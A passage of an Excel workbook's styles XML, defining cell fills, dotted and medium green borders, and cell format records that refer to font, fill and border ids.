        <fgColor rgb="FF5CCCCC"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF0066CC"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC3DBE9"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="0.8"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFBDCFE7"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.8"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.799951170384838"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="-0.249977111117893"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0" tint="-0.35"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4"/>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rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="medium">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="medium">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="medium">
        <color rgb="FF00B050"/>
      </right>
      <top style="medium">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="medium">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top/>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top/>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="medium">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="medium">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="medium">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="medium">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="medium">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF00B050"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right/>
      <top/>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top/>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right style="medium">
        <color rgb="FF00B050"/>
      </right>
      <top/>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right/>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF00B050"/>
      </left>
      <right/>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="medium">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="medium">
        <color rgb="FF00B050"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="dotted">
        <color rgb="FF00B050"/>
      </right>
      <top style="dotted">
        <color rgb="FF00B050"/>
      </top>
      <bottom style="medium">
        <color rgb="FF00B05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23" borderId="43"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4" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="44" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="45" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="24" borderId="46" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="25" borderId="47" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="25" borderId="46" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="26" borderId="48" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="0" borderId="49" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="50" applyNumberFormat="0" applyFill="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3" fillId="21"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4" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="49" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="50" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="199">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="1" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment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0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"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3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="22" fontId="1" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"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178" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="4" fillId="11" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="22" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="12" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="12" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="13" borderId="0" xfId="0" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="14" borderId="0" xfId="0" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="15"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0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="16"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8" fillId="14" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="16" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="11" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="17" borderId="3" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="17" borderId="4" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="17" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="lef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pplyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1"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7" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="12" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="12" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="14" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="15" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="16" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="16" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="17" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="18" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="18" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="18" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="18" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="18" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="18" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="18" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="18" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="18" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="18" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="18" borderId="22" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="19" borderId="23" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="19" borderId="23" xfId="0" applyFont="1" applyFill="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vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="24" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="24" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="25" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="26" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="24" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="25" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="26" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="2"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15" fillId="0" borderId="25" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="24" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="15" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="16" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="27" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="27" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="28" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="29" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>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xf>
    <xf numFmtId="14" fontId="0" fillId="13" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="14" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="23" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="33" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="34" xfId="0"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xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="35" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="34" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="14" borderId="34" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="34" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="35" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="35" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="37" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="38" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="39" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="23" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="23" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="14" borderId="30" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="0" fillId="14" borderId="30" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="32" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="0" fillId="14" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="0" fillId="0" borderId="23" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="40" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
